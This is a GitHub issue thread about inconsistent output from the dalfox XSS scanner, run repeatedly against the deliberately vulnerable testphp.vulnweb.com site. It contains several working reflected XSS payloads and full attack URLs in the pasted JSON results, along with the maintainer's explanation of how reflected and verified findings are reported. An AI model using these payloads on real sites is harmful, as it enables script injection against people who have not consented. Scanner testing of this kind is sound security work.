Inconsistent output

[ocervell]

Describe the bug

I've been running dalfox on the same URL over and over again, here are the results:

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?pleasedonthaveanamelikethis_plz_plz=DalFox","param":"","payload":"DalFox","evidence":"","cwe":"","severity":"Low","message_id":3,"message_str":"Found dalfox-error-mysql2 via built-in grepping / payload: DalFox"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CdETAILS%250aopen%250aonToGgle%250a%3D%250aa%3Dprompt%2Ca%28%29+class%3Ddalfox%3E","param":"cat","payload":"\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e","evidence":"48 line:  yntax to use near '=\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e'","cwe":"CWE-79","severity":"High","message_id":219,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aprint%281%29%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e","evidence":"48 line:  yntax to use near '=\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":351,"message_str":"Reflected Payload in HTML: cat=\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aconfirm%281%29+class%3Ddalfox%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e","evidence":"48 line:  yntax to use near '=\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e' at","cwe":"CWE-79","severity":"High","message_id":275,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%22%3E%3CSvg%2Fonload%3Dalert%281%29+class%3Ddlafox%3E","param":"cat","payload":"\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e","evidence":"48 line:  syntax to use near '\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":435,"message_str":"Reflected Payload in HTML: cat=\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CScRipt+class%3Ddalfox%3Eprompt.valueOf%28%29%281%29%3C%2Fscript%3E","param":"cat","payload":"\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e","evidence":"48 line:  yntax to use near '=\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":187,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert.bind%28%29%281%29%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e","evidence":"48 line:  yntax to use near '=\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":343,"message_str":"Reflected Payload in HTML: cat=\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CsVg%2Fonload%3Dprompt.valueOf%28%29%281%29+class%3Ddalfox%3E","param":"cat","payload":"\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e","evidence":"48 line:  yntax to use near '=\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":163,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CScRipt+class%3Ddalfox%3Econfirm%281%29%3C%2Fscript%3E","param":"cat","payload":"\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e","evidence":"48 line:  yntax to use near '=\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":175,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e"},
{}]

As you can see, the reflected XSS does not show up across all the runs. Any ideas why ?

Environment

• Dalfox Version: latest
• Installed from: go install -v github.com/hahwul/dalfox/v2@latest

[hahwul]

Hi @ocervell
Dalfox does not output R type if the vulnerability is identified as V type. Looking at the information you sent, it seems that all V types are included.

The reason why the R type is not printed when checking with V type is to prevent indiscriminate R output. Sometimes, Although it is a V type, the R output is caused by fast concurrency processing.

• R: Found payload reflection.
• V: DOM Parser, Headless Browser confirms that actual attack code is likely to be injected and executed
  • In most cases, the V Type check is preceded by the R Type check.